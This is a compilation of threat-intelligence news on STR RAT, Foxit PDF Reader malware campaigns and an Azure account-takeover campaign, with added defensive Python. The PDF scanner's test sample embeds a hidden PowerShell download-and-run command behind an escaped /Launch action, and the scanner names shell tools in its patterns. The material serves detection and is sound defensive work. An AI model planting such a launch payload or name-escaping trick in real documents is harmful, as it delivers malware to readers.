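The rule keys on the HTTP host header rather than the destination IP because dynamic-DNS names are re-pointed freely; pair it with the persistence artefacts in the previous section when triaging a hit.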

Legitimate Services

STR RAT reaches out to legitimate services for hosting tools and malware. Indicators of suspicious activity include access to GitHub and Maven repositories in conjunction with other malicious behaviors.

By understanding STR RAT's history, capabilities, and delivery mechanisms, cybersecurity professionals can better detect and defend against this persistent threat.

How Attackers Distribute Malware to Foxit PDF Reader Users

 

Threat actors are exploiting a design weakness in Foxit PDF Reader's security warning dialogs to deliver malware through booby-trapped PDF documents, according to researchers at Check Point.

The researchers have identified several campaigns targeting Foxit Reader users with malicious PDF files. Attackers are using various .NET and Python exploit builders, notably the “PDF Exploit Builder,” to create PDF documents carrying embedded actions that execute commands or scripts. These commands download and run malware such as Agent Tesla, Remcos RAT, XWorm, and NanoCore RAT.

"Regardless of the programming language, all builders exhibit a consistent structure. The PDF template used for the exploit includes placeholder text, which is meant to be replaced with the URL for downloading the malicious file once the user provides input," explained the researchers.

Additionally, threat actors are exploiting the fact that some of the pop-up alerts in Foxit Reader make the harmful option the default choice when opening these compromised files.

The first pop-up alert warns users that certain features are disabled to avoid potential security risks, giving them the option to trust the document one time only or always. Here the default is the safer choice. But once the user clicks OK, a second alert appears asking whether to let the document open a program, and that one defaults to the harmful choice.

Attackers are banking on users ignoring the alert text and quickly accepting the default options, thereby allowing Foxit Reader to execute the malicious command.
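Because the trick depends on a PDF action being present rather than on any parser bug, the files are easy to triage statically: look for the /Launch action (the one that opens a program), for /JavaScript, and for the /OpenAction trigger that fires them without a click. The scanner below is an added example, not Check Point's tooling. Both PDFs are constructed minimal stand-ins; the malicious one mirrors the builder template described above, with the download URL left as a placeholder and one action name written with a PDF #xx escape, a common way to hide such names from naive string matching. The scoring weights are assumptions.

```python
"""Static triage of a PDF for the actions an exploit-builder template relies on.
Added example; both PDFs are constructed stand-ins, weights are assumptions."""
import re
import zlib

BENIGN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Launch action fired on open; '/L#61unch' is '/Launch' with an escaped 'a'.
MALICIOUS_PDF = b"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
4 0 obj << /Type /Action /S /L#61unch /Win << /F (cmd.exe) /P (/c powershell -w hidden -c "iwr REPLACE_URL -o %TEMP%\\\\a.exe; %TEMP%\\\\a.exe") >> >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

NAME_ESCAPE_RE = re.compile(rb"#([0-9A-Fa-f]{2})")
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)
SUSPICIOUS_NAMES = (b"/Launch", b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/EmbeddedFile")
SHELL_RE = re.compile(rb"cmd(\.exe)?|powershell|mshta|wscript|cscript|rundll32", re.I)

def normalize(pdf: bytes) -> bytes:
    """Undo #xx name escapes and inflate Flate streams so names can be matched."""
    out = NAME_ESCAPE_RE.sub(lambda m: bytes([int(m.group(1), 16)]), pdf)
    def inflate(m):
        try:
            return b"stream\n" + zlib.decompress(m.group(1)) + b"\nendstream"
        except zlib.error:
            return m.group(0)          # not compressed (or not Flate): keep as is
    return STREAM_RE.sub(inflate, out)

def scan_pdf(pdf: bytes) -> dict:
    data = normalize(pdf)
    hits = {n.decode(): len(re.findall(re.escape(n) + rb"(?![A-Za-z])", data)) for n in SUSPICIOUS_NAMES}
    hits = {k: v for k, v in hits.items() if v}
    shell = bool(SHELL_RE.search(data)) if "/Launch" in hits else False
    score = 0
    if "/Launch" in hits:
        score += 3 + (3 if shell else 0)   # opening a program, worse with a shell
    if "/JavaScript" in hits or "/JS" in hits:
        score += 2
    if "/OpenAction" in hits or "/AA" in hits:
        score += 1                          # automatic trigger; only matters with the above
    return {"actions": hits, "launches_shell": shell, "score": score,
            "verdict": "malicious" if score >= 6 else "suspicious" if score >= 2 else "clean"}

if __name__ == "__main__":
    print(scan_pdf(BENIGN_PDF))
    print(scan_pdf(MALICIOUS_PDF))
```

The normalisation step is what keeps the check honest: without it a builder only has to spell /Launch as /L#61unch, or put the action dictionary in a compressed object stream, to slip past a plain grep.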

Foxit PDF Reader, used by over 700 million people globally, including in government and tech sectors, has been targeted by threat actors ranging from e-crime to APT groups. These groups have been leveraging this technique for years, often evading detection by antivirus software and sandboxes that focus primarily on Adobe Acrobat Reader.

"The infection success and low detection rate have enabled PDFs to be distributed through unconventional means, such as Facebook, without being intercepted by detection rules," the researchers noted.

Check Point has reported the issue to Foxit, and the company has announced plans to address it in version 2024.3.

"The proper approach would be to detect and disable such CMD executions. However, based on Foxit's response, they might simply change the default options to 'Do Not Open'," said Antonis Terefos, a reverse engineer at Check Point Research, to Help Net Security.

Efforts to reach Foxit for further comments have yet to receive a response.

Phishing and Cloud Account Takeover Campaign Targeting Microsoft Azure Users

 


Proofpoint researchers have uncovered an ongoing campaign in which Microsoft Azure accounts belonging to senior executives at several major corporations were compromised, affecting a variety of environments and exposing sensitive data. 

Proofpoint first detected the campaign in late November 2023. It combines credential phishing with cloud account takeover (ATO): victims are phished for their credentials, which the attackers then use to take over their cloud accounts. 

The attackers are reported to use proxy services to get around geographic restrictions and hide their actual location, which let them access Office Home and Microsoft 365 applications from the compromised accounts. The attack was carried out through links in shared documents that led to phishing websites. 

Some of these links carried the anchor text “View document,” which gave no hint of their real destination. The campaign targeted both mid-level and senior employees, though a greater number of mid-level accounts were compromised.

According to Proofpoint, the most frequently targeted roles were CEOs, presidents, account managers, finance directors, vice presidents of operations, and sales directors, giving the attackers access to information across levels and functions of the organization. 

In attacks of this kind, the criminals typically register their own MFA (multifactor authentication) method to extend their hold on a compromised account, adding a second phone number or enrolling an authenticator app so the legitimate user cannot simply regain control. They also delete evidence of their intrusion to cover their tracks. Data theft and financial fraud appear to be the primary goals of these attacks.
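The MFA-registration step is the most detectable part of that playbook: a successful sign-in from somewhere the user has never signed in from, followed within the hour by a new authentication method on the same account. The correlation below is an added example, not Proofpoint's detection logic. The sign-in and audit events are constructed and only loosely modelled on Entra ID sign-in and audit log fields; the per-user baseline and the sixty-minute window are assumptions.

```python
"""Correlate an out-of-baseline sign-in with an MFA-method change soon after.
Added example; events, baseline and window are constructed/assumed."""
from datetime import datetime, timedelta

# Constructed baseline: countries and ASNs each user normally signs in from.
BASELINE = {
    "cfo@example.invalid": {"countries": {"US"}, "asns": {"AS7922"}},
    "sales@example.invalid": {"countries": {"US", "GB"}, "asns": {"AS7922", "AS2856"}},
}

# Constructed sign-in events (loosely Entra ID sign-in log shaped).
SIGNINS = [
    {"user": "cfo@example.invalid", "time": "2023-11-21T08:02:00Z", "country": "US", "asn": "AS7922", "result": "success", "app": "OfficeHome"},
    {"user": "cfo@example.invalid", "time": "2023-11-21T13:40:00Z", "country": "NG", "asn": "AS37473", "result": "success", "app": "OfficeHome"},
    {"user": "sales@example.invalid", "time": "2023-11-21T14:05:00Z", "country": "GB", "asn": "AS2856", "result": "success", "app": "MySignins"},
    {"user": "sales@example.invalid", "time": "2023-11-21T15:00:00Z", "country": "RU", "asn": "AS12389", "result": "failure", "app": "OfficeHome"},
]

# Constructed audit events (loosely Entra ID audit log shaped).
AUDITS = [
    {"user": "cfo@example.invalid", "time": "2023-11-21T13:52:00Z", "activity": "User registered security info", "detail": "Authenticator app"},
    {"user": "cfo@example.invalid", "time": "2023-11-21T13:55:00Z", "activity": "Update user", "detail": "Added phone number"},
    {"user": "sales@example.invalid", "time": "2023-11-21T14:20:00Z", "activity": "User registered security info", "detail": "Phone"},
]

MFA_ACTIVITIES = {"User registered security info", "Update user", "User changed default security info"}
WINDOW = timedelta(minutes=60)

def ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")

def unfamiliar(signin, baseline):
    """True when either the country or the ASN is outside the user's baseline."""
    b = baseline.get(signin["user"], {"countries": set(), "asns": set()})
    return signin["country"] not in b["countries"] or signin["asn"] not in b["asns"]

def find_mfa_takeover(signins, audits, baseline=BASELINE, window=WINDOW):
    """One alert per successful out-of-baseline sign-in that is followed by an
    MFA-method change on the same account inside `window`."""
    alerts = []
    for s in signins:
        if s["result"] != "success" or not unfamiliar(s, baseline):
            continue
        t0 = ts(s["time"])
        changes = sorted((a for a in audits
                          if a["user"] == s["user"] and a["activity"] in MFA_ACTIVITIES
                          and t0 <= ts(a["time"]) <= t0 + window),
                         key=lambda a: a["time"])
        if changes:
            alerts.append({"user": s["user"], "signin_from": f"{s['country']}/{s['asn']}",
                           "minutes_to_first_change": int((ts(changes[0]["time"]) - t0).total_seconds() // 60),
                           "changes": [c["detail"] for c in changes]})
    return alerts

if __name__ == "__main__":
    for a in find_mfa_takeover(SIGNINS, AUDITS):
        print(a)
```

The sales user's new phone is not alerted because the preceding GB sign-in is inside that user's baseline, and the RU attempt failed; a proxy in the victim's own country would defeat the country check, which is why the ASN is compared as well.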

Attribution has not been confirmed, but the evidence points to operators in Russia or Nigeria, with infrastructure hosted by ISPs in those countries.